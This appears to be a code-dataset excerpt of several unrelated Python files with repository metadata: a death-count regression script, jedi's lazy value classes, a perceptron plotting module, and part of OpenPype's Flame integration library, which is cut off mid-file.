stderr = np.sqrt(np.sum((logdeaths-(slope*logdeaths+offset))**2) / (len(logdeaths)-2.)) / np.sqrt(np.sum((xdays - np.mean(xdays))**2))
if args.plot:
plt.plot(xdays, np.exp(offset + slope*xdays), 'C0-')
plt.plot(xdays, np.exp(offset + (slope+stderr)*xdays), 'C0--')
plt.plot(xdays, np.exp(offset + (slope-stderr)*xdays), 'C0--')
plt.plot(xdays, deaths, 'C0o')
plt.gca().set_yscale("log")
plt.show()
print("Slope: %.3e" % slope)
print("Doubling every: %.2f" % (np.log(2)/slope))
print("R-squared: %.3f" % (rval*rval))
print("Stderr: %.3e" % stderr)
| import argparse
import numpy as np
from scipy.stats import linregress
import matplotlib.pyplot as plt
parser = argparse.ArgumentParser()
parser.add_argument("--plot", action="store_const", default=False, const=True)
args = parser.parse_args()
data = np.loadtxt("../data/data.csv", skiprows=1, usecols=list(range(1,8)), delimiter=",")[33:,:]
xdays = data[:,0] - np.mean(data[:,0])
deaths = data[:,-1]
print(xdays, deaths)
logdeaths = np.log(deaths)
slope, offset, rval, pval, stderr = linregress(xdays, logdeaths)
stderr = np.sqrt(np.sum((logdeaths-(slope*logdeaths+offset))**2) / (len(logdeaths)-2.)) / np.sqrt(np.sum((xdays - np.mean(xdays))**2))
if args.plot:
plt.plot(xdays, np.exp(offset + slope*xdays), 'C0-')
plt.plot(xdays, np.exp(offset + (slope+stderr)*xdays), 'C0--')
plt.plot(xdays, np.exp(offset + (slope-stderr)*xdays), 'C0--')
plt.plot(xdays, deaths, 'C0o')
plt.gca().set_yscale("log")
plt.show()
print("Slope: %.3e" % slope)
print("Doubling every: %.2f" % (np.log(2)/slope))
print("R-squared: %.3f" % (rval*rval))
print("Stderr: %.3e" % stderr)
| none | 1 | 2.924307 | 3 |
|
.venv/lib/python3.7/site-packages/jedi/inference/lazy_value.py | ITCRStevenLPZ/Proyecto2-Analisis-de-Algoritmos | 76 | 10393 | <gh_stars>10-100
from jedi.inference.base_value import ValueSet, NO_VALUES
from jedi.common import monkeypatch
class AbstractLazyValue(object):
def __init__(self, data, min=1, max=1):
self.data = data
self.min = min
self.max = max
def __repr__(self):
return '<%s: %s>' % (self.__class__.__name__, self.data)
def infer(self):
raise NotImplementedError
class LazyKnownValue(AbstractLazyValue):
"""data is a Value."""
def infer(self):
return ValueSet([self.data])
class LazyKnownValues(AbstractLazyValue):
"""data is a ValueSet."""
def infer(self):
return self.data
class LazyUnknownValue(AbstractLazyValue):
def __init__(self, min=1, max=1):
super(LazyUnknownValue, self).__init__(None, min, max)
def infer(self):
return NO_VALUES
class LazyTreeValue(AbstractLazyValue):
def __init__(self, context, node, min=1, max=1):
super(LazyTreeValue, self).__init__(node, min, max)
self.context = context
# We need to save the predefined names. It's an unfortunate side effect
# that needs to be tracked otherwise results will be wrong.
self._predefined_names = dict(context.predefined_names)
def infer(self):
with monkeypatch(self.context, 'predefined_names', self._predefined_names):
return self.context.infer_node(self.data)
def get_merged_lazy_value(lazy_values):
if len(lazy_values) > 1:
return MergedLazyValues(lazy_values)
else:
return lazy_values[0]
class MergedLazyValues(AbstractLazyValue):
"""data is a list of lazy values."""
def infer(self):
return ValueSet.from_sets(l.infer() for l in self.data)
| from jedi.inference.base_value import ValueSet, NO_VALUES
from jedi.common import monkeypatch
class AbstractLazyValue(object):
def __init__(self, data, min=1, max=1):
self.data = data
self.min = min
self.max = max
def __repr__(self):
return '<%s: %s>' % (self.__class__.__name__, self.data)
def infer(self):
raise NotImplementedError
class LazyKnownValue(AbstractLazyValue):
"""data is a Value."""
def infer(self):
return ValueSet([self.data])
class LazyKnownValues(AbstractLazyValue):
"""data is a ValueSet."""
def infer(self):
return self.data
class LazyUnknownValue(AbstractLazyValue):
def __init__(self, min=1, max=1):
super(LazyUnknownValue, self).__init__(None, min, max)
def infer(self):
return NO_VALUES
class LazyTreeValue(AbstractLazyValue):
def __init__(self, context, node, min=1, max=1):
super(LazyTreeValue, self).__init__(node, min, max)
self.context = context
# We need to save the predefined names. It's an unfortunate side effect
# that needs to be tracked otherwise results will be wrong.
self._predefined_names = dict(context.predefined_names)
def infer(self):
with monkeypatch(self.context, 'predefined_names', self._predefined_names):
return self.context.infer_node(self.data)
def get_merged_lazy_value(lazy_values):
if len(lazy_values) > 1:
return MergedLazyValues(lazy_values)
else:
return lazy_values[0]
class MergedLazyValues(AbstractLazyValue):
"""data is a list of lazy values."""
def infer(self):
return ValueSet.from_sets(l.infer() for l in self.data) | en | 0.894648 | data is a Value. data is a ValueSet. # We need to save the predefined names. It's an unfortunate side effect # that needs to be tracked otherwise results will be wrong. data is a list of lazy values. | 2.448808 | 2 |
percept/plot.py | joshleeb/PerceptronVis | 0 | 10394 | <filename>percept/plot.py
import matplotlib.lines as lines
import matplotlib.pyplot as plt
COLOR_CLASSIFICATIONS = [
'black', # Unclassified
'blue', # Classified True (1)
'red' # Classified False (0)
]
def generate_line(ax, p0, p1, color='black', style='-'):
'''
Generates a line between points p0 and p1 which extends to be the width of
the plot.
'''
x0, y0 = p0
x1, y1 = p1
gradient = (y0 - y1) / (x0 - x1)
intercept = y1 - gradient * x1
x = ax.get_xlim()
data_y = [x[0] * gradient + intercept, x[1] * gradient + intercept]
return lines.Line2D(x, data_y, color=color, linestyle=style)
def get_boundary_plot_fn(weights):
'''
Gets the function used to represent and plot the line representative by the
perceptron's weights. The equation is: f(x) = -(w1/w2)x - w0/w2.
'''
def fn(x):
return -weights[1] / weights[2] * x - weights[0] / weights[2]
return fn
def get_point_color(point, colors):
'''
Get's the color of the point to be displayed.
'''
if point.classification is None:
return colors[0]
return colors[1] if point.classification else colors[2]
def generate(title, class_boundary, weights, points, bounds):
'''
Generates a scatter plot of points with the actualy classification boundary
and the perceptron's classification boundary drawn in.
'''
boundary_fn = get_boundary_plot_fn(weights)
fig, ax = plt.subplots(figsize=(8, 8))
ax.set_xlim(bounds[0])
ax.set_ylim(bounds[1])
ax.set_title(title)
ax.add_line(generate_line(
ax, class_boundary[0], class_boundary[1], 'cyan', '--'
))
ax.add_line(generate_line(ax, (0, boundary_fn(0)), (1, boundary_fn(1))))
ax.scatter(
[pt.x for pt in points], [pt.y for pt in points],
c=[get_point_color(pt, COLOR_CLASSIFICATIONS) for pt in points], s=30
)
return fig
| <filename>percept/plot.py
import matplotlib.lines as lines
import matplotlib.pyplot as plt
COLOR_CLASSIFICATIONS = [
'black', # Unclassified
'blue', # Classified True (1)
'red' # Classified False (0)
]
def generate_line(ax, p0, p1, color='black', style='-'):
'''
Generates a line between points p0 and p1 which extends to be the width of
the plot.
'''
x0, y0 = p0
x1, y1 = p1
gradient = (y0 - y1) / (x0 - x1)
intercept = y1 - gradient * x1
x = ax.get_xlim()
data_y = [x[0] * gradient + intercept, x[1] * gradient + intercept]
return lines.Line2D(x, data_y, color=color, linestyle=style)
def get_boundary_plot_fn(weights):
'''
Gets the function used to represent and plot the line representative by the
perceptron's weights. The equation is: f(x) = -(w1/w2)x - w0/w2.
'''
def fn(x):
return -weights[1] / weights[2] * x - weights[0] / weights[2]
return fn
def get_point_color(point, colors):
'''
Get's the color of the point to be displayed.
'''
if point.classification is None:
return colors[0]
return colors[1] if point.classification else colors[2]
def generate(title, class_boundary, weights, points, bounds):
'''
Generates a scatter plot of points with the actualy classification boundary
and the perceptron's classification boundary drawn in.
'''
boundary_fn = get_boundary_plot_fn(weights)
fig, ax = plt.subplots(figsize=(8, 8))
ax.set_xlim(bounds[0])
ax.set_ylim(bounds[1])
ax.set_title(title)
ax.add_line(generate_line(
ax, class_boundary[0], class_boundary[1], 'cyan', '--'
))
ax.add_line(generate_line(ax, (0, boundary_fn(0)), (1, boundary_fn(1))))
ax.scatter(
[pt.x for pt in points], [pt.y for pt in points],
c=[get_point_color(pt, COLOR_CLASSIFICATIONS) for pt in points], s=30
)
return fig
| en | 0.891626 | # Unclassified # Classified True (1) # Classified False (0) Generates a line between points p0 and p1 which extends to be the width of the plot. Gets the function used to represent and plot the line representative by the perceptron's weights. The equation is: f(x) = -(w1/w2)x - w0/w2. Get's the color of the point to be displayed. Generates a scatter plot of points with the actualy classification boundary and the perceptron's classification boundary drawn in. | 3.863605 | 4 |
openpype/hosts/flame/api/lib.py | j-cube/OpenPype | 1 | 10395 | import sys
import os
import re
import json
import pickle
import tempfile
import itertools
import contextlib
import xml.etree.cElementTree as cET
from copy import deepcopy
from xml.etree import ElementTree as ET
from pprint import pformat
from .constants import (
MARKER_COLOR,
MARKER_DURATION,
MARKER_NAME,
COLOR_MAP,
MARKER_PUBLISH_DEFAULT
)
import openpype.api as openpype
log = openpype.Logger.get_logger(__name__)
FRAME_PATTERN = re.compile(r"[\._](\d+)[\.]")
class CTX:
# singleton used for passing data between api modules
app_framework = None
flame_apps = []
selection = None
@contextlib.contextmanager
def io_preferences_file(klass, filepath, write=False):
try:
flag = "w" if write else "r"
yield open(filepath, flag)
except IOError as _error:
klass.log.info("Unable to work with preferences `{}`: {}".format(
filepath, _error))
class FlameAppFramework(object):
# flameAppFramework class takes care of preferences
class prefs_dict(dict):
def __init__(self, master, name, **kwargs):
self.name = name
self.master = master
if not self.master.get(self.name):
self.master[self.name] = {}
self.master[self.name].__init__()
def __getitem__(self, k):
return self.master[self.name].__getitem__(k)
def __setitem__(self, k, v):
return self.master[self.name].__setitem__(k, v)
def __delitem__(self, k):
return self.master[self.name].__delitem__(k)
def get(self, k, default=None):
return self.master[self.name].get(k, default)
def setdefault(self, k, default=None):
return self.master[self.name].setdefault(k, default)
def pop(self, *args, **kwargs):
return self.master[self.name].pop(*args, **kwargs)
def update(self, mapping=(), **kwargs):
self.master[self.name].update(mapping, **kwargs)
def __contains__(self, k):
return self.master[self.name].__contains__(k)
def copy(self): # don"t delegate w/ super - dict.copy() -> dict :(
return type(self)(self)
def keys(self):
return self.master[self.name].keys()
@classmethod
def fromkeys(cls, keys, v=None):
return cls.master[cls.name].fromkeys(keys, v)
def __repr__(self):
return "{0}({1})".format(
type(self).__name__, self.master[self.name].__repr__())
def master_keys(self):
return self.master.keys()
def __init__(self):
self.name = self.__class__.__name__
self.bundle_name = "OpenPypeFlame"
# self.prefs scope is limited to flame project and user
self.prefs = {}
self.prefs_user = {}
self.prefs_global = {}
self.log = log
try:
import flame
self.flame = flame
self.flame_project_name = self.flame.project.current_project.name
self.flame_user_name = flame.users.current_user.name
except Exception:
self.flame = None
self.flame_project_name = None
self.flame_user_name = None
import socket
self.hostname = socket.gethostname()
if sys.platform == "darwin":
self.prefs_folder = os.path.join(
os.path.expanduser("~"),
"Library",
"Caches",
"OpenPype",
self.bundle_name
)
elif sys.platform.startswith("linux"):
self.prefs_folder = os.path.join(
os.path.expanduser("~"),
".OpenPype",
self.bundle_name)
self.prefs_folder = os.path.join(
self.prefs_folder,
self.hostname,
)
self.log.info("[{}] waking up".format(self.__class__.__name__))
try:
self.load_prefs()
except RuntimeError:
self.save_prefs()
# menu auto-refresh defaults
if not self.prefs_global.get("menu_auto_refresh"):
self.prefs_global["menu_auto_refresh"] = {
"media_panel": True,
"batch": True,
"main_menu": True,
"timeline_menu": True
}
self.apps = []
def get_pref_file_paths(self):
prefix = self.prefs_folder + os.path.sep + self.bundle_name
prefs_file_path = "_".join([
prefix, self.flame_user_name,
self.flame_project_name]) + ".prefs"
prefs_user_file_path = "_".join([
prefix, self.flame_user_name]) + ".prefs"
prefs_global_file_path = prefix + ".prefs"
return (prefs_file_path, prefs_user_file_path, prefs_global_file_path)
def load_prefs(self):
(proj_pref_path, user_pref_path,
glob_pref_path) = self.get_pref_file_paths()
with io_preferences_file(self, proj_pref_path) as prefs_file:
self.prefs = pickle.load(prefs_file)
self.log.info(
"Project - preferences contents:\n{}".format(
pformat(self.prefs)
))
with io_preferences_file(self, user_pref_path) as prefs_file:
self.prefs_user = pickle.load(prefs_file)
self.log.info(
"User - preferences contents:\n{}".format(
pformat(self.prefs_user)
))
with io_preferences_file(self, glob_pref_path) as prefs_file:
self.prefs_global = pickle.load(prefs_file)
self.log.info(
"Global - preferences contents:\n{}".format(
pformat(self.prefs_global)
))
return True
def save_prefs(self):
# make sure the preference folder is available
if not os.path.isdir(self.prefs_folder):
try:
os.makedirs(self.prefs_folder)
except Exception:
self.log.info("Unable to create folder {}".format(
self.prefs_folder))
return False
# get all pref file paths
(proj_pref_path, user_pref_path,
glob_pref_path) = self.get_pref_file_paths()
with io_preferences_file(self, proj_pref_path, True) as prefs_file:
pickle.dump(self.prefs, prefs_file)
self.log.info(
"Project - preferences contents:\n{}".format(
pformat(self.prefs)
))
with io_preferences_file(self, user_pref_path, True) as prefs_file:
pickle.dump(self.prefs_user, prefs_file)
self.log.info(
"User - preferences contents:\n{}".format(
pformat(self.prefs_user)
))
with io_preferences_file(self, glob_pref_path, True) as prefs_file:
pickle.dump(self.prefs_global, prefs_file)
self.log.info(
"Global - preferences contents:\n{}".format(
pformat(self.prefs_global)
))
return True
def get_current_project():
import flame
return flame.project.current_project
def get_current_sequence(selection):
import flame
def segment_to_sequence(_segment):
track = _segment.parent
version = track.parent
return version.parent
process_timeline = None
if len(selection) == 1:
if isinstance(selection[0], flame.PySequence):
process_timeline = selection[0]
if isinstance(selection[0], flame.PySegment):
process_timeline = segment_to_sequence(selection[0])
else:
for segment in selection:
if isinstance(segment, flame.PySegment):
process_timeline = segment_to_sequence(segment)
break
return process_timeline
def rescan_hooks():
import flame
try:
flame.execute_shortcut('Rescan Python Hooks')
except Exception:
pass
def get_metadata(project_name, _log=None):
# TODO: can be replaced by MediaInfoFile class method
from adsk.libwiretapPythonClientAPI import (
WireTapClient,
WireTapServerHandle,
WireTapNodeHandle,
WireTapStr
)
class GetProjectColorPolicy(object):
def __init__(self, host_name=None, _log=None):
# Create a connection to the Backburner manager using the Wiretap
# python API.
#
self.log = _log or log
self.host_name = host_name or "localhost"
self._wiretap_client = WireTapClient()
if not self._wiretap_client.init():
raise Exception("Could not initialize Wiretap Client")
self._server = WireTapServerHandle(
"{}:IFFFS".format(self.host_name))
def process(self, project_name):
policy_node_handle = WireTapNodeHandle(
self._server,
"/projects/{}/syncolor/policy".format(project_name)
)
self.log.info(policy_node_handle)
policy = WireTapStr()
if not policy_node_handle.getNodeTypeStr(policy):
self.log.warning(
"Could not retrieve policy of '%s': %s" % (
policy_node_handle.getNodeId().id(),
policy_node_handle.lastError()
)
)
return policy.c_str()
policy_wiretap = GetProjectColorPolicy(_log=_log)
return policy_wiretap.process(project_name)
def get_segment_data_marker(segment, with_marker=None):
"""
Get openpype track item tag created by creator or loader plugin.
Attributes:
segment (flame.PySegment): flame api object
with_marker (bool)[optional]: if true it will return also marker object
Returns:
dict: openpype tag data
Returns(with_marker=True):
flame.PyMarker, dict
"""
for marker in segment.markers:
comment = marker.comment.get_value()
color = marker.colour.get_value()
name = marker.name.get_value()
if (name == MARKER_NAME) and (
color == COLOR_MAP[MARKER_COLOR]):
if not with_marker:
return json.loads(comment)
else:
return marker, json.loads(comment)
def set_segment_data_marker(segment, data=None):
"""
Set openpype track item tag to input segment.
Attributes:
segment (flame.PySegment): flame api object
Returns:
dict: json loaded data
"""
data = data or dict()
marker_data = get_segment_data_marker(segment, True)
if marker_data:
# get available openpype tag if any
marker, tag_data = marker_data
# update tag data with new data
tag_data.update(data)
# update marker with tag data
marker.comment = json.dumps(tag_data)
else:
# update tag data with new data
marker = create_segment_data_marker(segment)
# add tag data to marker's comment
marker.comment = json.dumps(data)
def set_publish_attribute(segment, value):
""" Set Publish attribute in input Tag object
Attribute:
segment (flame.PySegment)): flame api object
value (bool): True or False
"""
tag_data = get_segment_data_marker(segment)
tag_data["publish"] = value
# set data to the publish attribute
set_segment_data_marker(segment, tag_data)
def get_publish_attribute(segment):
""" Get Publish attribute from input Tag object
Attribute:
segment (flame.PySegment)): flame api object
Returns:
bool: True or False
"""
tag_data = get_segment_data_marker(segment)
if not tag_data:
set_publish_attribute(segment, MARKER_PUBLISH_DEFAULT)
return MARKER_PUBLISH_DEFAULT
return tag_data["publish"]
def create_segment_data_marker(segment):
""" Create openpype marker on a segment.
Attributes:
segment (flame.PySegment): flame api object
Returns:
flame.PyMarker: flame api object
"""
# get duration of segment
duration = segment.record_duration.relative_frame
# calculate start frame of the new marker
start_frame = int(segment.record_in.relative_frame) + int(duration / 2)
# create marker
marker = segment.create_marker(start_frame)
# set marker name
marker.name = MARKER_NAME
# set duration
marker.duration = MARKER_DURATION
# set colour
marker.colour = COLOR_MAP[MARKER_COLOR] # Red
return marker
def get_sequence_segments(sequence, selected=False):
segments = []
# loop versions in sequence
for ver in sequence.versions:
# loop track in versions
for track in ver.tracks:
# ignore all empty tracks and hidden too
if len(track.segments) == 0 and track.hidden:
continue
# loop all segment in remaining tracks
for segment in track.segments:
if segment.name.get_value() == "":
continue
if segment.hidden.get_value() is True:
continue
if (
selected is True
and segment.selected.get_value() is not True
):
continue
# add it to original selection
segments.append(segment)
return segments
@contextlib.contextmanager
def maintained_segment_selection(sequence):
"""Maintain selection during context
Attributes:
sequence (flame.PySequence): python api object
Yield:
list of flame.PySegment
Example:
>>> with maintained_segment_selection(sequence) as selected_segments:
... for segment in selected_segments:
... segment.selected = False
>>> print(segment.selected)
True
"""
selected_segments = get_sequence_segments(sequence, True)
try:
# do the operation on selected segments
yield selected_segments
finally:
# reset all selected clips
reset_segment_selection(sequence)
# select only original selection of segments
for segment in selected_segments:
segment.selected = True
def reset_segment_selection(sequence):
"""Deselect all selected nodes
"""
for ver in sequence.versions:
for track in ver.tracks:
if len(track.segments) == 0 and track.hidden:
continue
for segment in track.segments:
segment.selected = False
def _get_shot_tokens_values(clip, tokens):
old_value = None
output = {}
if not clip.shot_name:
return output
old_value = clip.shot_name.get_value()
for token in tokens:
clip.shot_name.set_value(token)
_key = str(re.sub("[<>]", "", token)).replace(" ", "_")
try:
output[_key] = int(clip.shot_name.get_value())
except ValueError:
output[_key] = clip.shot_name.get_value()
clip.shot_name.set_value(old_value)
return output
def get_segment_attributes(segment):
if segment.name.get_value() == "":
return None
# Add timeline segment to tree
clip_data = {
"shot_name": segment.shot_name.get_value(),
"segment_name": segment.name.get_value(),
"segment_comment": segment.comment.get_value(),
"tape_name": segment.tape_name,
"source_name": segment.source_name,
"fpath": segment.file_path,
"PySegment": segment
}
# head and tail with forward compatibility
if segment.head:
# `infinite` can be also returned
if isinstance(segment.head, str):
clip_data["segment_head"] = 0
else:
clip_data["segment_head"] = int(segment.head)
if segment.tail:
# `infinite` can be also returned
if isinstance(segment.tail, str):
clip_data["segment_tail"] = 0
else:
clip_data["segment_tail"] = int(segment.tail)
# add all available shot tokens
shot_tokens = _get_shot_tokens_values(segment, [
"<colour space>", "<width>", "<height>", "<depth>", "<segment>",
"<track>", "<track name>"
])
clip_data.update(shot_tokens)
# populate shot source metadata
segment_attrs = [
"record_duration", "record_in", "record_out",
"source_duration", "source_in", "source_out"
]
segment_attrs_data = {}
for attr_name in segment_attrs:
if not hasattr(segment, attr_name):
continue
attr = getattr(segment, attr_name)
segment_attrs_data[attr] = str(attr).replace("+", ":")
if attr_name in ["record_in", "record_out"]:
clip_data[attr_name] = attr.relative_frame
else:
clip_data[attr_name] = attr.frame
clip_data["segment_timecodes"] = segment_attrs_data
return clip_data
def get_clips_in_reels(project):
output_clips = []
project_desktop = project.current_workspace.desktop
for reel_group in project_desktop.reel_groups:
for reel in reel_group.reels:
for clip in reel.clips:
clip_data = {
"PyClip": clip,
"fps": float(str(clip.frame_rate)[:-4])
}
attrs = [
"name", "width", "height",
"ratio", "sample_rate", "bit_depth"
]
for attr in attrs:
val = getattr(clip, attr)
clip_data[attr] = val
version = clip.versions[-1]
track = version.tracks[-1]
for segment in track.segments:
segment_data = get_segment_attributes(segment)
clip_data.update(segment_data)
output_clips.append(clip_data)
return output_clips
def get_reformated_filename(filename, padded=True):
"""
Return fixed python expression path
Args:
filename (str): file name
Returns:
type: string with reformated path
Example:
get_reformated_filename("plate.1001.exr") > plate.%04d.exr
"""
found = FRAME_PATTERN.search(filename)
if not found:
log.info("File name is not sequence: {}".format(filename))
return filename
padding = get_padding_from_filename(filename)
replacement = "%0{}d".format(padding) if padded else "%d"
start_idx, end_idx = found.span(1)
return replacement.join(
[filename[:start_idx], filename[end_idx:]]
)
def get_padding_from_filename(filename):
"""
Return padding number from Flame path style
Args:
filename (str): file name
Returns:
int: padding number
Example:
get_padding_from_filename("plate.0001.exr") > 4
"""
found = get_frame_from_filename(filename)
return len(found) if found else None
def get_frame_from_filename(filename):
"""
Return sequence number from Flame path style
Args:
filename (str): file name
Returns:
int: sequence frame number
Example:
def get_frame_from_filename(path):
("plate.0001.exr") > 0001
"""
found = re.findall(FRAME_PATTERN, filename)
return found.pop() if found else None
@contextlib.contextmanager
def maintained_object_duplication(item):
"""Maintain input item duplication
Attributes:
item (any flame.PyObject): python api object
Yield:
duplicate input PyObject type
"""
import flame
# Duplicate the clip to avoid modifying the original clip
duplicate = flame.duplicate(item)
try:
# do the operation on selected segments
yield duplicate
finally:
# delete the item at the end
flame.delete(duplicate)
@contextlib.contextmanager
def maintained_temp_file_path(suffix=None):
_suffix = suffix or ""
try:
# Store dumped json to temporary file
temporary_file = tempfile.mktemp(
suffix=_suffix, prefix="flame_maintained_")
yield temporary_file.replace("\\", "/")
except IOError as _error:
raise IOError(
"Not able to create temp json file: {}".format(_error))
finally:
# Remove the temporary json
os.remove(temporary_file)
def get_clip_segment(flame_clip):
name = flame_clip.name.get_value()
version = flame_clip.versions[0]
track = version.tracks[0]
segments = track.segments
if len(segments) < 1:
raise ValueError("Clip `{}` has no segments!".format(name))
if len(segments) > 1:
raise ValueError("Clip `{}` has too many segments!".format(name))
return segments[0]
def get_batch_group_from_desktop(name):
project = get_current_project()
project_desktop = project.current_workspace.desktop
for bgroup in project_desktop.batch_groups:
if bgroup.name.get_value() in name:
return bgroup
class MediaInfoFile(object):
"""Class to get media info file clip data
Raises:
IOError: MEDIA_SCRIPT_PATH path doesn't exists
TypeError: Not able to generate clip xml data file
ET.ParseError: Missing clip in xml clip data
IOError: Not able to save xml clip data to file
Attributes:
str: `MEDIA_SCRIPT_PATH` path to flame binary
logging.Logger: `log` logger
TODO: add method for getting metadata to dict
"""
MEDIA_SCRIPT_PATH = "/opt/Autodesk/mio/current/dl_get_media_info"
log = log
_clip_data = None
_start_frame = None
_fps = None
_drop_mode = None
def __init__(self, path, **kwargs):
# replace log if any
if kwargs.get("logger"):
self.log = kwargs["logger"]
# test if `dl_get_media_info` paht exists
self._validate_media_script_path()
# derivate other feed variables
self.feed_basename = os.path.basename(path)
self.feed_dir = os.path.dirname(path)
self.feed_ext = os.path.splitext(self.feed_basename)[1][1:].lower()
with maintained_temp_file_path(".clip") as tmp_path:
self.log.info("Temp File: {}".format(tmp_path))
self._generate_media_info_file(tmp_path)
# get clip data and make them single if there is multiple
# clips data
xml_data = self._make_single_clip_media_info(tmp_path)
self.log.debug("xml_data: {}".format(xml_data))
self.log.debug("type: {}".format(type(xml_data)))
# get all time related data and assign them
self._get_time_info_from_origin(xml_data)
self.log.debug("start_frame: {}".format(self.start_frame))
self.log.debug("fps: {}".format(self.fps))
self.log.debug("drop frame: {}".format(self.drop_mode))
self.clip_data = xml_data
@property
def clip_data(self):
"""Clip's xml clip data
Returns:
xml.etree.ElementTree: xml data
"""
return self._clip_data
@clip_data.setter
def clip_data(self, data):
self._clip_data = data
@property
def start_frame(self):
""" Clip's starting frame found in timecode
Returns:
int: number of frames
"""
return self._start_frame
@start_frame.setter
def start_frame(self, number):
self._start_frame = int(number)
@property
def fps(self):
""" Clip's frame rate
Returns:
float: frame rate
"""
return self._fps
@fps.setter
def fps(self, fl_number):
self._fps = float(fl_number)
@property
def drop_mode(self):
""" Clip's drop frame mode
Returns:
str: drop frame flag
"""
return self._drop_mode
@drop_mode.setter
def drop_mode(self, text):
self._drop_mode = str(text)
def _validate_media_script_path(self):
if not os.path.isfile(self.MEDIA_SCRIPT_PATH):
raise IOError("Media Scirpt does not exist: `{}`".format(
self.MEDIA_SCRIPT_PATH))
def _generate_media_info_file(self, fpath):
# Create cmd arguments for gettig xml file info file
cmd_args = [
self.MEDIA_SCRIPT_PATH,
"-e", self.feed_ext,
"-o", fpath,
self.feed_dir
]
try:
# execute creation of clip xml template data
openpype.run_subprocess(cmd_args)
except TypeError as error:
raise TypeError(
"Error creating `{}` due: {}".format(fpath, error))
def _make_single_clip_media_info(self, fpath):
with open(fpath) as f:
lines = f.readlines()
_added_root = itertools.chain(
"<root>", deepcopy(lines)[1:], "</root>")
new_root = ET.fromstringlist(_added_root)
# find the clip which is matching to my input name
xml_clips = new_root.findall("clip")
matching_clip = None
for xml_clip in xml_clips:
if xml_clip.find("name").text in self.feed_basename:
matching_clip = xml_clip
if matching_clip is None:
# return warning there is missing clip
raise ET.ParseError(
"Missing clip in `{}`. Available clips {}".format(
self.feed_basename, [
xml_clip.find("name").text
for xml_clip in xml_clips
]
))
return matching_clip
def _get_time_info_from_origin(self, xml_data):
try:
for out_track in xml_data.iter('track'):
for out_feed in out_track.iter('feed'):
# start frame
out_feed_nb_ticks_obj = out_feed.find(
'startTimecode/nbTicks')
self.start_frame = out_feed_nb_ticks_obj.text
# fps
out_feed_fps_obj = out_feed.find(
'startTimecode/rate')
self.fps = out_feed_fps_obj.text
# drop frame mode
out_feed_drop_mode_obj = out_feed.find(
'startTimecode/dropMode')
self.drop_mode = out_feed_drop_mode_obj.text
break
else:
continue
except Exception as msg:
self.log.warning(msg)
@staticmethod
def write_clip_data_to_file(fpath, xml_element_data):
""" Write xml element of clip data to file
Args:
fpath (string): file path
xml_element_data (xml.etree.ElementTree.Element): xml data
Raises:
IOError: If data could not be written to file
"""
try:
# save it as new file
tree = cET.ElementTree(xml_element_data)
tree.write(
fpath, xml_declaration=True,
method='xml', encoding='UTF-8'
)
except IOError as error:
raise IOError(
"Not able to write data to file: {}".format(error))
| import sys
import os
import re
import json
import pickle
import tempfile
import itertools
import contextlib
import xml.etree.cElementTree as cET
from copy import deepcopy
from xml.etree import ElementTree as ET
from pprint import pformat
from .constants import (
MARKER_COLOR,
MARKER_DURATION,
MARKER_NAME,
COLOR_MAP,
MARKER_PUBLISH_DEFAULT
)
import openpype.api as openpype
log = openpype.Logger.get_logger(__name__)
FRAME_PATTERN = re.compile(r"[\._](\d+)[\.]")
class CTX:
# singleton used for passing data between api modules
app_framework = None
flame_apps = []
selection = None
@contextlib.contextmanager
def io_preferences_file(klass, filepath, write=False):
try:
flag = "w" if write else "r"
yield open(filepath, flag)
except IOError as _error:
klass.log.info("Unable to work with preferences `{}`: {}".format(
filepath, _error))
class FlameAppFramework(object):
# flameAppFramework class takes care of preferences
class prefs_dict(dict):
def __init__(self, master, name, **kwargs):
self.name = name
self.master = master
if not self.master.get(self.name):
self.master[self.name] = {}
self.master[self.name].__init__()
def __getitem__(self, k):
return self.master[self.name].__getitem__(k)
def __setitem__(self, k, v):
return self.master[self.name].__setitem__(k, v)
def __delitem__(self, k):
return self.master[self.name].__delitem__(k)
def get(self, k, default=None):
return self.master[self.name].get(k, default)
def setdefault(self, k, default=None):
return self.master[self.name].setdefault(k, default)
def pop(self, *args, **kwargs):
return self.master[self.name].pop(*args, **kwargs)
def update(self, mapping=(), **kwargs):
self.master[self.name].update(mapping, **kwargs)
def __contains__(self, k):
return self.master[self.name].__contains__(k)
def copy(self): # don"t delegate w/ super - dict.copy() -> dict :(
return type(self)(self)
def keys(self):
return self.master[self.name].keys()
@classmethod
def fromkeys(cls, keys, v=None):
return cls.master[cls.name].fromkeys(keys, v)
def __repr__(self):
return "{0}({1})".format(
type(self).__name__, self.master[self.name].__repr__())
def master_keys(self):
return self.master.keys()
def __init__(self):
self.name = self.__class__.__name__
self.bundle_name = "OpenPypeFlame"
# self.prefs scope is limited to flame project and user
self.prefs = {}
self.prefs_user = {}
self.prefs_global = {}
self.log = log
try:
import flame
self.flame = flame
self.flame_project_name = self.flame.project.current_project.name
self.flame_user_name = flame.users.current_user.name
except Exception:
self.flame = None
self.flame_project_name = None
self.flame_user_name = None
import socket
self.hostname = socket.gethostname()
if sys.platform == "darwin":
self.prefs_folder = os.path.join(
os.path.expanduser("~"),
"Library",
"Caches",
"OpenPype",
self.bundle_name
)
elif sys.platform.startswith("linux"):
self.prefs_folder = os.path.join(
os.path.expanduser("~"),
".OpenPype",
self.bundle_name)
self.prefs_folder = os.path.join(
self.prefs_folder,
self.hostname,
)
self.log.info("[{}] waking up".format(self.__class__.__name__))
try:
self.load_prefs()
except RuntimeError:
self.save_prefs()
# menu auto-refresh defaults
if not self.prefs_global.get("menu_auto_refresh"):
self.prefs_global["menu_auto_refresh"] = {
"media_panel": True,
"batch": True,
"main_menu": True,
"timeline_menu": True
}
self.apps = []
def get_pref_file_paths(self):
prefix = self.prefs_folder + os.path.sep + self.bundle_name
prefs_file_path = "_".join([
prefix, self.flame_user_name,
self.flame_project_name]) + ".prefs"
prefs_user_file_path = "_".join([
prefix, self.flame_user_name]) + ".prefs"
prefs_global_file_path = prefix + ".prefs"
return (prefs_file_path, prefs_user_file_path, prefs_global_file_path)
def load_prefs(self):
(proj_pref_path, user_pref_path,
glob_pref_path) = self.get_pref_file_paths()
with io_preferences_file(self, proj_pref_path) as prefs_file:
self.prefs = pickle.load(prefs_file)
self.log.info(
"Project - preferences contents:\n{}".format(
pformat(self.prefs)
))
with io_preferences_file(self, user_pref_path) as prefs_file:
self.prefs_user = pickle.load(prefs_file)
self.log.info(
"User - preferences contents:\n{}".format(
pformat(self.prefs_user)
))
with io_preferences_file(self, glob_pref_path) as prefs_file:
self.prefs_global = pickle.load(prefs_file)
self.log.info(
"Global - preferences contents:\n{}".format(
pformat(self.prefs_global)
))
return True
def save_prefs(self):
